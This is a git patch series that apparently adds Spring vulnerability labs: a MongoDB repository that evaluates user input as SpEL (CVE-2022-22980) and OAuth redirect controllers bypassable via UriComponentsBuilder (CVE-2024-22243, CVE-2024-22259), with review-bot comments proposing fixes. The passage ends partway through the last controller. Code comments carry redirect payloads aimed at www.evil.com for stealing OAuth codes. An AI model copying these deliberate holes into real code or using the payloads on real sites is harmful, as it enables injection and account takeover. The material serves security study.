diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java
new file mode 100644
index 00000000..a59fbae2
--- /dev/null
+++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java
@@ -0,0 +1,13 @@
+package com.threedr3am.bug.spring.data.mongodb.repository;
+
+import com.threedr3am.bug.spring.data.mongodb.entity.Demo;
+import java.util.List;
+import org.springframework.data.mongodb.repository.Query;
+import org.springframework.data.repository.Repository;
+
+@org.springframework.stereotype.Repository
+public interface DemoRepository extends Repository {
+
+ @Query("{ arg0 : :#{?0} }")
+ List findAllByIdLike(String keyword);
+}
diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/resources/application.yml b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/resources/application.yml
new file mode 100644
index 00000000..5525fd44
--- /dev/null
+++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/resources/application.yml
@@ -0,0 +1,8 @@
+#spring:
+# data:
+# mongodb:
+# host: 127.0.0.1
+# port: 27017
+# database: test
+# username: admin
+# password: 123456
\ No newline at end of file
From b5e8427aea7b7d370953c452280ade27394a14ca Mon Sep 17 00:00:00 2001
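Review bot: `@Query("{ arg0 : :#{?0} }")` in `DemoRepository` wraps the caller-supplied argument in a SpEL template, and `DemoController.demo` passes the raw `keyword` request parameter into it, so on the Spring Data MongoDB releases covered by CVE-2022-22980 (named in this module's README) the request value is evaluated as an expression instead of being bound as data. The next patch's hunk on this file (`{ id : :#{?0} }` and the added `findAllByIdLike2` with `?#{?0}`) keeps the same construct. Outside this lab the parameter should be bound directly, `@Query("{ id : ?0 }")`, and the dependency moved to a release the advisory lists as fixed. Because the interface is vulnerable on purpose, a comment above the method such as `// Intentionally vulnerable: SpEL over user input (CVE-2022-22980 demo), do not copy` would keep it from being reused as a pattern.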
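Review bot: `application.yml` contains only commented-out MongoDB settings, so the server starts on Spring Boot's default bind address and the deliberately vulnerable `/demo` endpoint is reachable from other hosts on the same network. Adding `server.address: 127.0.0.1` would keep the lab on loopback, which matches the `127.0.0.1:8080` usage in the README. The commented `username: admin` / `password: 123456` pair is better written as placeholders in case the block is ever uncommented.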
From: threedr3am <929811313@qq.com>
Date: Tue, 21 Jun 2022 20:54:58 +0800
Subject: [PATCH 3/5] add Query
---
 .../bug/spring/data/mongodb/repository/DemoRepository.java | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java
index a59fbae2..aa1f6edc 100644
--- a/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java
+++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java
@@ -8,6 +8,9 @@
 @org.springframework.stereotype.Repository
 public interface DemoRepository extends Repository {
 
- @Query("{ arg0 : :#{?0} }")
+ @Query("{ id : :#{?0} }")
 List findAllByIdLike(String keyword);
+
+ @Query("{ id : ?#{?0} }")
+ List findAllByIdLike2(String keyword);
 }
From 65a6bd4f72c985b4f31821a732e7da39050910ac Mon Sep 17 00:00:00 2001
From: threedr3am <929811313@qq.com> Date: Fri, 23 Feb 2024 01:04:29 +0800 Subject: [PATCH 4/5] add CVE-2024-22243 & optimize project --- apache-poi/pom.xml | 2 +- .../dubbo-hessian2-safe-reinforcement/pom.xml | 1 - fastjson/pom.xml | 11 +++ jackson/pom.xml | 2 +- pom.xml | 83 ------------------- shiro/auth-bypass-shiro-1-4-1/pom.xml | 1 - shiro/auth-bypass-shiro-1-5-1/pom.xml | 1 - shiro/auth-bypass-shiro-1-5-3/pom.xml | 1 - shiro/auth-bypass-shiro-1-7-1/pom.xml | 1 - shiro/auth-bypass-shiro-1-8-0/pom.xml | 1 - spring/pom.xml | 1 + .../pom.xml | 1 - .../pom.xml | 1 - .../pom.xml | 1 - spring/spring-uricomponentsbuilder/pom.xml | 27 ++++++ .../bug/spring/uricomponentsbuilder/Main.java | 15 ++++ .../controller/OAuthController.java | 74 +++++++++++++++++ 17 files changed, 130 insertions(+), 94 deletions(-) create mode 100644 spring/spring-uricomponentsbuilder/pom.xml create mode 100644 spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java create mode 100644 spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java diff --git a/apache-poi/pom.xml b/apache-poi/pom.xml index 5bc7ea1f..99da6a52 100644 --- a/apache-poi/pom.xml +++ b/apache-poi/pom.xml @@ -9,7 +9,7 @@ 4.0.0 - apache-com.threedr3am.bug.poi + apache-poi pom cve-2014-3529 diff --git a/dubbo/dubbo-hessian2-safe-reinforcement/pom.xml b/dubbo/dubbo-hessian2-safe-reinforcement/pom.xml index 11355cdc..34ed8817 100644 --- a/dubbo/dubbo-hessian2-safe-reinforcement/pom.xml +++ b/dubbo/dubbo-hessian2-safe-reinforcement/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 2.1.11.RELEASE - 4.0.0 diff --git a/fastjson/pom.xml b/fastjson/pom.xml index a93758cc..c6585ab1 100644 --- a/fastjson/pom.xml +++ b/fastjson/pom.xml @@ -19,6 +19,17 @@ 1.2.68 + + org.python + jython + 2.5.3-rc1 + + + org.postgresql + postgresql + 42.5.0 + + com.xyh common 
diff --git a/jackson/pom.xml b/jackson/pom.xml index 24b3e34b..50b0dde3 100644 --- a/jackson/pom.xml +++ b/jackson/pom.xml @@ -88,7 +88,7 @@ - acc + com.codahale.metrics metrics-healthchecks 3.0.2 diff --git a/pom.xml b/pom.xml index e09a4391..0e883edd 100644 --- a/pom.xml +++ b/pom.xml @@ -47,92 +47,9 @@ 4.11 test - - - - org.mozilla - rhino - 1.7.6 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - maven-clean-plugin - 3.0.0 - - - - maven-resources-plugin - 3.0.2 - - - maven-compiler-plugin - 3.7.0 - - - maven-surefire-plugin - 2.20.1 - - - maven-jar-plugin - 3.0.2 - - - maven-install-plugin - 2.5.2 - - - maven-deploy-plugin - 2.8.2 - - - org.apache.maven.plugins diff --git a/shiro/auth-bypass-shiro-1-4-1/pom.xml b/shiro/auth-bypass-shiro-1-4-1/pom.xml index 18215b3a..0b14eb26 100644 --- a/shiro/auth-bypass-shiro-1-4-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-4-1/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE - 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-5-1/pom.xml b/shiro/auth-bypass-shiro-1-5-1/pom.xml index 92fb2643..033eba39 100644 --- a/shiro/auth-bypass-shiro-1-5-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-1/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE - 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-5-3/pom.xml b/shiro/auth-bypass-shiro-1-5-3/pom.xml index 197a9891..6afbe308 100644 --- a/shiro/auth-bypass-shiro-1-5-3/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-3/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE - 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-7-1/pom.xml b/shiro/auth-bypass-shiro-1-7-1/pom.xml index 079c2a0a..0c6d9b08 100644 --- a/shiro/auth-bypass-shiro-1-7-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-7-1/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE - 4.0.0 
diff --git a/shiro/auth-bypass-shiro-1-8-0/pom.xml b/shiro/auth-bypass-shiro-1-8-0/pom.xml index 2de5d4ca..ac7304cb 100644 --- a/shiro/auth-bypass-shiro-1-8-0/pom.xml +++ b/shiro/auth-bypass-shiro-1-8-0/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE - 4.0.0 diff --git a/spring/pom.xml b/spring/pom.xml index 680c8649..dffacb44 100644 --- a/spring/pom.xml +++ b/spring/pom.xml @@ -15,6 +15,7 @@ spring-boot-actuator-bug spring-cloud-config-server-CVE-2020-5410 spring-data-mongodb-spel-CVE-2022-22980 + spring-uricomponentsbuilder diff --git a/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml b/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml index 7d6dd8ca..be2f2b57 100644 --- a/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml +++ b/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 2.0.3.RELEASE - 4.0.0 diff --git a/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml b/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml index b7035208..856737a0 100644 --- a/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml +++ b/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 2.2.1.RELEASE - 4.0.0 diff --git a/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml b/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml index d693c060..dc3f703d 100644 --- a/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml +++ b/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml @@ -6,7 +6,6 @@ org.springframework.boot spring-boot-starter-parent 2.2.2.RELEASE - 4.0.0 spring-cloud-config-server-CVE-2020-5410 diff --git a/spring/spring-uricomponentsbuilder/pom.xml b/spring/spring-uricomponentsbuilder/pom.xml new file mode 100644 index 00000000..c5fb0b4c --- /dev/null +++ b/spring/spring-uricomponentsbuilder/pom.xml 
@@ -0,0 +1,27 @@ + + + + org.springframework.boot + spring-boot-starter-parent + 2.3.5.RELEASE + + + 4.0.0 + + spring-uricomponentsbuilder + + + 8 + 8 + + + + + org.springframework.boot + spring-boot-starter-web + + + + \ No newline at end of file diff --git a/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java b/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java new file mode 100644 index 00000000..a2bb9780 --- /dev/null +++ b/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java @@ -0,0 +1,15 @@ +package com.threedr3am.bug.spring.uricomponentsbuilder; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +/** + * @author threedr3am + */ +@SpringBootApplication +public class Main { + + public static void main(String[] args) { + SpringApplication.run(Main.class, args); + } +} diff --git a/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java b/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java new file mode 100644 index 00000000..4821ff40 --- /dev/null +++ b/spring/spring-uricomponentsbuilder/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java 
@@ -0,0 +1,74 @@ +package com.threedr3am.bug.spring.uricomponentsbuilder.controller; + +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.GetMapping; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestParam; +import org.springframework.web.util.UriComponents; +import org.springframework.web.util.UriComponentsBuilder; + +import javax.servlet.http.HttpServletResponse; +import java.io.IOException; +import java.util.Arrays; +import java.util.HashSet; +import java.util.Set; + +/** + * @author threedr3am + * + * CVE-2024-22243 + * + * Spring Framework 是一个开源的Java应用程序框架,UriComponentsBuilder是Spring Web中用于构建和操作URI的工具类。 + * 受影响版本中,由于 UriComponentsBuilder 处理URL时未正确过滤用户信息中的方括号 `[` ,攻击者可构造包含方括号的恶意URL绕过主机名验证。 + * 如果应用程序依赖UriComponentsBuilder.fromUriString()等方法对URL进行解析和校验,则可能导致验证绕过,出现开放重定向或SSRF漏洞。 + * + * ### 修复方案 + * 1. 将 org.springframework:spring-web 升级至 6.1.4 及以上版本 + * 2. 将 org.springframework:spring-web 升级至 6.0.17 及以上版本 + * 3. 将 org.springframework:spring-web 升级至 5.3.32 及以上版本 + * + * ### 参考链接 + * 1. https://www.oscs1024.com/hd/MPS-uwzo-gx91 + * 2. https://spring.io/security/cve-2024-22243 + * 3. https://github.com/spring-projects/spring-framework/commit/7ec5c994c147f0e168149498b1c9d4a249d69e87 + * 4. 
https://nvd.nist.gov/vuln/detail/CVE-2024-22243 + */ +@Controller +@RequestMapping("/oauth") +public class OAuthController { + + private static final Set whiteDomains = new HashSet<>(Arrays.asList(new String[]{ + ".fuckpdd.com" + })); + + /** + * 一般绕过oauth的host校验,可以开放重定向到恶意站点劫持code + * 访问:http://127.0.0.1:8080/oauth?redirect_uri=http%3A%2F%2Fwww.fuckpdd.com%5B%40www.evil.com%2Ftou + * + * + * @param redirectUri http://www.fuckpdd.com[@www.evil.com/tou + * @return + */ + @GetMapping + public String oauth(@RequestParam(name = "redirect_uri") String redirectUri, HttpServletResponse response) throws IOException { + UriComponents uriComponents = UriComponentsBuilder.fromUriString(redirectUri).build(); + String schema = uriComponents.getScheme(); + String host = uriComponents.getHost(); + String path = uriComponents.getPath(); + + System.out.printf("schema:%s\n", schema); + System.out.printf("host:%s\n", host); + System.out.printf("path:%s\n", path); + + boolean pass = false; + for (String whiteDomain : whiteDomains) { + if (host.endsWith(whiteDomain)) { + pass = true; + break; + } + } + if (!pass) return "error"; + + return "redirect:" + redirectUri; + } +} From 3f7fe9d8eab29f88fd0c6fb8362d21696b5cb95c Mon Sep 17 00:00:00 2001 
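Review bot: In `oauth` the allow-list is applied to the host that `UriComponentsBuilder.fromUriString` extracted, but the redirect is then issued with the raw `redirectUri` string, so the check is only as good as the agreement between this parser and the client's; the class comment's CVE-2024-22243 describes a case where they disagree. `uriComponents.getHost()` can also be `null`, in which case `host.endsWith(whiteDomain)` throws instead of returning `"error"`, and `schema` is printed but never checked. Apart from moving spring-web to one of the fixed versions listed in the class comment, I would reject a missing host or non-HTTP scheme and require a second, strict parse to agree on the host before redirecting, as sketched below. The same handler is added again under `spring-uricomponentsbuilder-2` later in this series and needs the same change.

```java
    public String oauth(@RequestParam(name = "redirect_uri") String redirectUri, HttpServletResponse response) throws IOException {
        // ... unchanged: UriComponentsBuilder parse and the three printf lines ...

        // Reject values without a host or with a non-HTTP scheme before the allow-list runs.
        if (host == null || !("http".equalsIgnoreCase(schema) || "https".equalsIgnoreCase(schema))) {
            return "error";
        }
        // Second opinion from a strict parser: refuse the redirect when it fails or disagrees.
        String strictHost;
        try {
            strictHost = new java.net.URI(redirectUri).getHost();
        } catch (java.net.URISyntaxException e) {
            return "error";
        }
        if (!host.equalsIgnoreCase(strictHost)) {
            return "error";
        }

        // ... unchanged: whiteDomains loop, error return, redirect ...
```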
From: threedr3am <929811313@qq.com> Date: Thu, 14 Mar 2024 23:05:17 +0800 Subject: [PATCH 5/5] fix any pom & add CVE-2024-22259 demo --- shiro/auth-bypass-shiro-1-4-1/pom.xml | 1 + shiro/auth-bypass-shiro-1-5-1/pom.xml | 1 + shiro/auth-bypass-shiro-1-5-3/pom.xml | 1 + shiro/auth-bypass-shiro-1-7-1/pom.xml | 1 + shiro/auth-bypass-shiro-1-8-0/pom.xml | 1 + .../actuator-1.2/pom.xml | 1 + .../actuator-1.3/pom.xml | 1 + .../actuator-1.4/pom.xml | 1 + .../actuator-1.5/pom.xml | 13 +--- .../actuator-2.0/pom.xml | 13 +--- .../pom.xml | 1 + .../bug/spring/config/server/Application.java | 0 .../spring/config/server/package-info.java | 0 .../src/main/resources/application.yml | 0 .../pom.xml | 1 + .../pom.xml | 1 + .../pom.xml | 1 + spring/spring-uricomponentsbuilder-2/pom.xml | 33 +++++++++ .../bug/spring/uricomponentsbuilder/Main.java | 15 ++++ .../controller/OAuthController.java | 74 +++++++++++++++++++ spring/spring-uricomponentsbuilder/pom.xml | 8 +- 21 files changed, 143 insertions(+), 25 deletions(-) rename spring/{spring-cloud-config-server(CVE-2019-3799) => spring-cloud-config-server-CVE-2019-3799}/pom.xml (95%) rename spring/{spring-cloud-config-server(CVE-2019-3799) => spring-cloud-config-server-CVE-2019-3799}/src/main/java/com/threedr3am/bug/spring/config/server/Application.java (100%) rename spring/{spring-cloud-config-server(CVE-2019-3799) => spring-cloud-config-server-CVE-2019-3799}/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java (100%) rename spring/{spring-cloud-config-server(CVE-2019-3799) => spring-cloud-config-server-CVE-2019-3799}/src/main/resources/application.yml (100%) create mode 100644 spring/spring-uricomponentsbuilder-2/pom.xml create mode 100644 spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java create mode 100644 spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java 
diff --git a/shiro/auth-bypass-shiro-1-4-1/pom.xml b/shiro/auth-bypass-shiro-1-4-1/pom.xml index 0b14eb26..65600748 100644 --- a/shiro/auth-bypass-shiro-1-4-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-4-1/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE + 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-5-1/pom.xml b/shiro/auth-bypass-shiro-1-5-1/pom.xml index 033eba39..1423f473 100644 --- a/shiro/auth-bypass-shiro-1-5-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-1/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE + 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-5-3/pom.xml b/shiro/auth-bypass-shiro-1-5-3/pom.xml index 6afbe308..d00854fe 100644 --- a/shiro/auth-bypass-shiro-1-5-3/pom.xml +++ b/shiro/auth-bypass-shiro-1-5-3/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE + 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-7-1/pom.xml b/shiro/auth-bypass-shiro-1-7-1/pom.xml index 0c6d9b08..842e2b1c 100644 --- a/shiro/auth-bypass-shiro-1-7-1/pom.xml +++ b/shiro/auth-bypass-shiro-1-7-1/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE + 4.0.0 diff --git a/shiro/auth-bypass-shiro-1-8-0/pom.xml b/shiro/auth-bypass-shiro-1-8-0/pom.xml index ac7304cb..bcf8a10c 100644 --- a/shiro/auth-bypass-shiro-1-8-0/pom.xml +++ b/shiro/auth-bypass-shiro-1-8-0/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.22.RELEASE + 4.0.0 diff --git a/spring/spring-boot-actuator-bug/actuator-1.2/pom.xml b/spring/spring-boot-actuator-bug/actuator-1.2/pom.xml index e5b439b1..9c96b228 100644 --- a/spring/spring-boot-actuator-bug/actuator-1.2/pom.xml +++ b/spring/spring-boot-actuator-bug/actuator-1.2/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.2.8.RELEASE + 4.0.0 
diff --git a/spring/spring-boot-actuator-bug/actuator-1.3/pom.xml b/spring/spring-boot-actuator-bug/actuator-1.3/pom.xml index b9090740..60df3a39 100644 --- a/spring/spring-boot-actuator-bug/actuator-1.3/pom.xml +++ b/spring/spring-boot-actuator-bug/actuator-1.3/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.3.8.RELEASE + 4.0.0 diff --git a/spring/spring-boot-actuator-bug/actuator-1.4/pom.xml b/spring/spring-boot-actuator-bug/actuator-1.4/pom.xml index 0bfe7d4b..a7bf9e37 100644 --- a/spring/spring-boot-actuator-bug/actuator-1.4/pom.xml +++ b/spring/spring-boot-actuator-bug/actuator-1.4/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.4.7.RELEASE + 4.0.0 diff --git a/spring/spring-boot-actuator-bug/actuator-1.5/pom.xml b/spring/spring-boot-actuator-bug/actuator-1.5/pom.xml index 8eb31588..3f145784 100644 --- a/spring/spring-boot-actuator-bug/actuator-1.5/pom.xml +++ b/spring/spring-boot-actuator-bug/actuator-1.5/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 1.5.16.RELEASE + 4.0.0 @@ -39,18 +40,6 @@ - - - - org.springframework.boot - spring-boot-maven-plugin - - true - - - - - diff --git a/spring/spring-boot-actuator-bug/actuator-2.0/pom.xml b/spring/spring-boot-actuator-bug/actuator-2.0/pom.xml index e689f443..26e0b1b4 100644 --- a/spring/spring-boot-actuator-bug/actuator-2.0/pom.xml +++ b/spring/spring-boot-actuator-bug/actuator-2.0/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 2.0.5.RELEASE + 4.0.0 @@ -56,18 +57,6 @@ - - - - org.springframework.boot - spring-boot-maven-plugin - - true - - - - - diff --git a/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml b/spring/spring-cloud-config-server-CVE-2019-3799/pom.xml similarity index 95% rename from spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml rename to spring/spring-cloud-config-server-CVE-2019-3799/pom.xml index be2f2b57..a72a9fb4 100644 
--- a/spring/spring-cloud-config-server(CVE-2019-3799)/pom.xml +++ b/spring/spring-cloud-config-server-CVE-2019-3799/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 2.0.3.RELEASE + 4.0.0 diff --git a/spring/spring-cloud-config-server(CVE-2019-3799)/src/main/java/com/threedr3am/bug/spring/config/server/Application.java b/spring/spring-cloud-config-server-CVE-2019-3799/src/main/java/com/threedr3am/bug/spring/config/server/Application.java similarity index 100% rename from spring/spring-cloud-config-server(CVE-2019-3799)/src/main/java/com/threedr3am/bug/spring/config/server/Application.java rename to spring/spring-cloud-config-server-CVE-2019-3799/src/main/java/com/threedr3am/bug/spring/config/server/Application.java diff --git a/spring/spring-cloud-config-server(CVE-2019-3799)/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java b/spring/spring-cloud-config-server-CVE-2019-3799/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java similarity index 100% rename from spring/spring-cloud-config-server(CVE-2019-3799)/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java rename to spring/spring-cloud-config-server-CVE-2019-3799/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java diff --git a/spring/spring-cloud-config-server(CVE-2019-3799)/src/main/resources/application.yml b/spring/spring-cloud-config-server-CVE-2019-3799/src/main/resources/application.yml similarity index 100% rename from spring/spring-cloud-config-server(CVE-2019-3799)/src/main/resources/application.yml rename to spring/spring-cloud-config-server-CVE-2019-3799/src/main/resources/application.yml diff --git a/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml b/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml index 856737a0..ef86677d 100644 --- a/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml +++ b/spring/spring-cloud-config-server-CVE-2020-5405/pom.xml 
@@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 2.2.1.RELEASE + 4.0.0 diff --git a/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml b/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml index dc3f703d..dfb9ba14 100644 --- a/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml +++ b/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 2.2.2.RELEASE + 4.0.0 spring-cloud-config-server-CVE-2020-5410 diff --git a/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml b/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml index b8648693..16dcc7db 100644 --- a/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml +++ b/spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml @@ -6,6 +6,7 @@ org.springframework.boot spring-boot-starter-parent 2.6.8 + 4.0.0 diff --git a/spring/spring-uricomponentsbuilder-2/pom.xml b/spring/spring-uricomponentsbuilder-2/pom.xml new file mode 100644 index 00000000..d7609148 --- /dev/null +++ b/spring/spring-uricomponentsbuilder-2/pom.xml @@ -0,0 +1,33 @@ + + + + org.springframework.boot + spring-boot-starter-parent + 2.7.18 + + + 4.0.0 + + spring-uricomponentsbuilder-2 + + + 8 + 8 + + + + + org.springframework.boot + spring-boot-starter-web + + + + org.springframework + spring-web + 5.3.32 + + + + \ No newline at end of file diff --git a/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java b/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java new file mode 100644 index 00000000..a2bb9780 --- /dev/null +++ b/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/Main.java 
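Review bot: The new `spring-uricomponentsbuilder-2/pom.xml` appears to pin only `org.springframework:spring-web` to `5.3.32` under the `2.7.18` Boot parent (the XML tags are lost in this rendering, so this is read from the remaining values), which leaves the other Spring Framework modules at whatever version the parent manages and puts a mixed framework on the classpath. Setting the parent's `spring-framework.version` property to the affected release would keep the modules aligned. A comment next to the pin, for example `<!-- intentionally pinned to a release affected by CVE-2024-22259; do not bump -->`, would also stop an automated dependency update from silently defusing the lab. The last hunk of this patch pins `5.3.31` in `spring-uricomponentsbuilder/pom.xml` the same way.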
@@ -0,0 +1,15 @@
+package com.threedr3am.bug.spring.uricomponentsbuilder;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+/**
+ * @author threedr3am
+ */
+@SpringBootApplication
+public class Main {
+
+ public static void main(String[] args) {
+ SpringApplication.run(Main.class, args);
+ }
+}
diff --git a/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java b/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java
new file mode 100644
index 00000000..413e0b9c
--- /dev/null
+++ b/spring/spring-uricomponentsbuilder-2/src/main/java/com/threedr3am/bug/spring/uricomponentsbuilder/controller/OAuthController.java
@@ -0,0 +1,74 @@ +package com.threedr3am.bug.spring.uricomponentsbuilder.controller; + +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.GetMapping; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestParam; +import org.springframework.web.util.UriComponents; +import org.springframework.web.util.UriComponentsBuilder; + +import javax.servlet.http.HttpServletResponse; +import java.io.IOException; +import java.util.Arrays; +import java.util.HashSet; +import java.util.Set; + +/** + * @author threedr3am + * + * CVE-2024-22259 + * + * 使用UricomponentsBuilder解析外部提供的URL(例如通过查询参数)并对解析URL的主机执行验证检查的应用程序可能容易受到公开重定向攻击, + * 如果在通过验证检查后使用该URL,则可能容易受到SSRF攻击。 + * 这与CVE-2024-22243相同,这是另一种输入不同的情况。 + * + * ### 修复方案 + * 1. 将 org.springframework:spring-web 升级至 6.1.5 及以上版本 + * 2. 将 org.springframework:spring-web 升级至 6.0.18 及以上版本 + * 3. 将 org.springframework:spring-web 升级至 5.3.33 及以上版本 + * + * ### 参考链接 + * https://spring.io/security/cve-2024-22259 + * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22259 + * + */ +@Controller +@RequestMapping("/oauth") +public class OAuthController { + + private static final Set whiteDomains = new HashSet<>(Arrays.asList(new String[]{ + ".fuckpdd.com" + })); + + /** + * 一般绕过oauth的host校验,可以开放重定向到恶意站点劫持code + * 访问:http://127.0.0.1:8080/oauth?redirect_uri=http%3A%2F%2F%40www.fuckpdd.com%5B%40www.evil.com%2Ftou + * + * + * @param redirectUri [CVE-2024-22259] -> http://@www.fuckpdd.com[@www.evil.com/tou + * [CVE-2024-22243] -> http://www.fuckpdd.com[@www.evil.com/tou + * @return + */ + @GetMapping + public String oauth(@RequestParam(name = "redirect_uri") String redirectUri, HttpServletResponse response) throws IOException { + UriComponents uriComponents = UriComponentsBuilder.fromUriString(redirectUri).build(); + String schema = uriComponents.getScheme(); + String host = uriComponents.getHost(); + String path = uriComponents.getPath(); + + 
